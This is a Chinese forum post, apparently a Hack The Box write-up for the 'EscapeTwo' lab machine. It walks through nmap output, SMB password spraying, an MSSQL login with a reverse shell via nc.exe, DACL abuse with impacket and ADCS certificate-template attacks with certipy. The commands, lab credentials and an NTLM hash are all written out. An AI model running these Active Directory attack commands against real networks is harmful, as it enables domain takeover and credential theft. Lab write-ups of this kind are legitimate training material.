qidao123.com技术社区-IT企服评测·应用市场

标题: HTB打靶记录-EscapeTwo [打印本页]
作者: 张裕    时间: 2025-4-6 21:00
标题: HTB打靶记录-EscapeTwo
信息收集

nmap -sV -sC -O 10.10.11.51
  1. Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 14:52 CST
  2. Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
  3. Service scan Timing: About 69.23% done; ETC: 14:54 (0:00:06 remaining)
  4. Nmap scan report for 10.10.11.51
  5. Host is up (0.64s latency).
  6. Not shown: 987 filtered tcp ports (no-response)
  7. PORT     STATE SERVICE       VERSION
  8. 53/tcp   open  domain        Simple DNS Plus
  9. 88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-05 06:34:49Z)
  10. 135/tcp  open  msrpc         Microsoft Windows RPC
  11. 139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
  12. 389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
  13. | ssl-cert: Subject: commonName=DC01.sequel.htb
  14. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
  15. | Not valid before: 2024-06-08T17:35:00
  16. |_Not valid after:  2025-06-08T17:35:00
  17. |_ssl-date: 2025-04-05T06:36:44+00:00; -19m04s from scanner time.
  18. 445/tcp  open  microsoft-ds?
  19. 464/tcp  open  kpasswd5?
  20. 593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  21. 636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
  22. |_ssl-date: 2025-04-05T06:36:43+00:00; -19m02s from scanner time.
  23. | ssl-cert: Subject: commonName=DC01.sequel.htb
  24. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
  25. | Not valid before: 2024-06-08T17:35:00
  26. |_Not valid after:  2025-06-08T17:35:00
  27. 1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
  28. | ms-sql-info:
  29. |   10.10.11.51:1433:
  30. |     Version:
  31. |       name: Microsoft SQL Server 2019 RTM
  32. |       number: 15.00.2000.00
  33. |       Product: Microsoft SQL Server 2019
  34. |       Service pack level: RTM
  35. |       Post-SP patches applied: false
  36. |_    TCP port: 1433
  37. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
  38. | Not valid before: 2025-04-04T19:43:03
  39. |_Not valid after:  2055-04-04T19:43:03
  40. |_ssl-date: 2025-04-05T06:36:45+00:00; -19m04s from scanner time.
  41. | ms-sql-ntlm-info:
  42. |   10.10.11.51:1433:
  43. |     Target_Name: SEQUEL
  44. |     NetBIOS_Domain_Name: SEQUEL
  45. |     NetBIOS_Computer_Name: DC01
  46. |     DNS_Domain_Name: sequel.htb
  47. |     DNS_Computer_Name: DC01.sequel.htb
  48. |     DNS_Tree_Name: sequel.htb
  49. |_    Product_Version: 10.0.17763
  50. 3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
  51. | ssl-cert: Subject: commonName=DC01.sequel.htb
  52. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
  53. | Not valid before: 2024-06-08T17:35:00
  54. |_Not valid after:  2025-06-08T17:35:00
  55. |_ssl-date: 2025-04-05T06:36:46+00:00; -19m03s from scanner time.
  56. 3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
  57. | ssl-cert: Subject: commonName=DC01.sequel.htb
  58. | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
  59. | Not valid before: 2024-06-08T17:35:00
  60. |_Not valid after:  2025-06-08T17:35:00
  61. |_ssl-date: 2025-04-05T06:36:43+00:00; -19m04s from scanner time.
  62. 5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  63. |_http-server-header: Microsoft-HTTPAPI/2.0
  64. |_http-title: Not Found
  65. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  66. Device type: general purpose
  67. Running (JUST GUESSING): Microsoft Windows 2019|10 (91%)
  68. OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
  69. Aggressive OS guesses: Windows Server 2019 (91%), Microsoft Windows 10 1903 - 21H1 (85%)
  70. No exact OS matches for host (test conditions non-ideal).
  71. Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
  73. Host script results:
  74. | smb2-time:
  75. |   date: 2025-04-05T06:36:08
  76. |_  start_date: N/A
  77. | smb2-security-mode:
  78. |   3:1:1:
  79. |_    Message signing enabled and required
  80. |_clock-skew: mean: -19m03s, deviation: 1s, median: -19m03s
  82. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  83. Nmap done: 1 IP address (1 host up) scanned in 189.83 seconds
复制代码
smb攻击

题目形貌给了个账号密码:rose:KxEPkKe6R8su,smbclient连接一下,impacket-smbclient sequel/rose:KxEPkKe6R8su@10.10.11.51

下载excel,010修改一下文件头,504B0304,修复乐成打开,拿到用户名密码,做一个密码本
  1. KxEPkKe6R8su
  2. 0fwz7Q4mSpurIt99
  3. 86LxLBMgEWaKUnBG
  4. Md9Wlq1E5bZnVDVo
  5. MSSQLP@ssw0rd!
复制代码
用户名怕不全,smb爆一下用户名

做一个用户表
  1. Administrator
  2. Guest
  3. krbtgt
  4. DC01$
  5. michael
  6. ryan
  7. oscar
  8. sql_svc
  9. rose
  10. ca_svc
复制代码
也可以ldap来收集用户名

大差不差,smb密码喷洒一下

获得新凭据:oscar:86LxLBMgEWaKUnBG,测试winrm连不上,切换思绪,之前发现的excel表中有这一组账号密码:sa:MSSQLP@ssw0rd!,nmap也扫出了1433端口有mssql,登录一下,impacket-mssqlclient sequel/sa:'MSSQLP@ssw0rd!'@10.10.11.51

测试发现有128长度限制,那传个nc.exe上去,反连

发现新凭据:sql_svc:WqSZAF6CysDQbGb3,使用这个密码去喷洒一下

获得新凭据:ryan:WqSZAF6CysDQbGb3,winrm连一下

使用bloodhound收集一下域信息,不过首先得同步一下与目标的时间,使用faketime伪造一下

上传到GUI中,直接分析ryan用户的关系网

DACL攻击

ryan用户对ca_svc用户有writeownerer权限,先将ca_svc的所有者修改成ryan
impacket-owneredit -action write -new-owner ryan -target ca_svc -dc-ip 10.10.11.51 sequel/ryan:WqSZAF6CysDQbGb3

在利用dacl将ryan的权限修改成FullControl
impacket-dacledit -action write -rights FullControl -target ca_svc -principal ryan -dc-ip 10.10.11.51 sequel.htb/ryan:WqSZAF6CysDQbGb3

注意以上两步需要连贯快速的执行,不然第二步大概会失败
Shadow Credentials Attack (ESC4)

ESC4 滥用 Active Directory 帐户的密钥凭据属性,允许攻击者使用基于证书的身份验证绕过以其他用户身份进行身份验证。
通过ca_svc所属用户组Cert Publishersc推测的攻击思绪......正常人能想到吗?此攻击将向 ca_svc 添加恶意密钥凭据,并允许 Ryan 使用证书而不是密码以 ca_svc 的身份进行身份验证,实在就是可以获取ca_svc的NTLM HASH凭据
certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -dc-ip 10.10.11.51

这里注意都要faketime一下,要不然获取TGT会失败,这里找证书漏洞模板
certipy-ad find -u 'ca_svc' -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -target 10.10.11.51 -stdout -vulnerable

使用这个模板可以以管理员身份请求dc,先修改一下模板
certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug

再请求Administrator获取证书

使用该证书去请求拿到Administrator的hash
certipy-ad auth -pfx administrator.pfx -ns 10.10.11.51 -debug

winrm登录管理员
evil-winrm -i 10.10.11.51 -u Administrator -H ?????????????
拿到flag

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 qidao123.com技术社区-IT企服评测·应用市场 (https://dis.qidao123.com/) Powered by Discuz! X3.4